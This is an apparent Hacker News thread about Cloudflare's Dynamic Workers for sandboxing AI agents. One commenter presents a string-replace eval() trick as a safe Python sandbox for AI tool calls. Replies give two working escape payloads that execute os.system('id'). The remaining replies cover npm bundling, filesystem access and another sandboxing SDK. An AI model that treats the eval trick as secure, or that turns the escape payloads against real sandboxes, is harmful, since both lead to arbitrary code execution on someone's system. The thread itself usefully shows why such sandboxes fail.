alt.hn

3/24/2026 at 1:40:04 PM

Sandboxing AI agents, 100x faster

 https://blog.cloudflare.com/dynamic-workers/

by kentonv

3/24/2026 at 3:21:23 PM

slightly related, if you need a safe python sandbox instead of eval(), you can try

eval(YOUR_CODE.replace('__', ''), {'__builtins__': None}, {})

I saw this trick on reddit many years ago and wrote a blog last month https://blog.est.im/2026/stdout-09

I wasn't able to crack this sandbox, and neither could opus-4.6-thinking.

This sandbox won't protect you from DoS, but I think it's reasonably safe to use it for AI tool calls. Just expose your MCP/RPC methods in the last {} and you are good.

by est

3/25/2026 at 1:14:02 AM

You can bypass this with unicode:

eval('[c._﹍init﹍_._﹍globals﹍_["os"].system("id") for c in ()._﹍class﹍_._﹍bases﹍_[0]._﹍subclasses﹍_() if c._﹍init﹍_._﹍class﹍_._﹍name﹍_ == "function" and "os" in c._﹍init﹍_._﹍globals﹍_]'.replace('__', ''), {'__builtins__': None}, {})

by farlow

3/25/2026 at 1:17:24 AM

You can do it without unicode, too:

eval("(L:=[None],g:=(x.gi_frame.f_back.f_back.f_builtins for x in L),L.clear(),L.append(g),bi:=g.send(None),bi['_'+'_import_'+'_']('os').system('id'))".replace('__', ''), {'__builtins__': None}, {})

by farlow

3/25/2026 at 2:28:59 AM

damn you are good. Is this a new py3 thing?

I must missed lots of CTF lessons.

How about adding another .replace('﹍','').replace('gi_frame', '') ?

by est

3/25/2026 at 1:01:45 AM

Could an AI decide to download JavaScript libraries of its choice into a dynamic worker? That wouldn't be as flexible as a full Linux VM but it might be interesting.

Edit: I guess not:

> If your Dynamic Worker needs TypeScript compilation or npm dependencies, the code must be transpiled and bundled before passing to the Worker Loader.

https://developers.cloudflare.com/dynamic-workers/getting-st...

by skybrian

3/25/2026 at 1:52:18 AM

When using Dynamic Workers, you generally don't run the AI harness inside the Dynamic Worker itself, but rather as a regular worker. But your harness would have a tool call that's like "executeCode" which runs code in the dynamic worker.

You could certainly set it up to allow the AI to import arbitrary npm modules if you want. We even offer a library to help with that:

https://www.npmjs.com/package/@cloudflare/worker-bundler

by kentonv

3/24/2026 at 10:18:40 PM

If anyone wants native python sandboxing without needing a cloud API, we just shipped an early python SDK from the https://nono.sh project:

import nono_py as nono

# Define capabilities caps = nono.CapabilitySet() caps.allow_path("/project", nono.AccessMode.READ_WRITE) caps.allow_file("/home/user/.gitconfig", nono.AccessMode.READ)

# Apply sandbox (irrevocable) nono.apply(caps)

# Your agent code runs here, fully sandboxed agent.run()

example using pydantic and fast API:

https://github.com/always-further/pydantic-ai-fastapi-nono

by decodebytes

3/24/2026 at 2:11:59 PM

Let's say I have a bunch of objects (e.g. parquet) in R2, can the agent mount them? Or how do I best give the agent access to the objects? HTTP w/ signed urls? Injecting the credentials?

by tosh

3/24/2026 at 2:17:58 PM

Dynamic Workers don't have a built-in filesystem, but you can give them access to one.

What you would do is give the Worker a TypeScript RPC interface that lets it read the files -- which you implement in your own Worker. To give it fast access, you might consider using a Durable Object. Download the data into the Durable Object's local SQLite database, then create an RPC interface to that, and pass it off to the Dynamic Worker running on the same machine.

See also this experimental package from Sunil that's exploring what the Dynamic Worker equivalent of a shell and a filesystem might be:

https://www.npmjs.com/package/@cloudflare/shell

by kentonv

3/24/2026 at 2:27:24 PM

[dead]

by Remi_Etien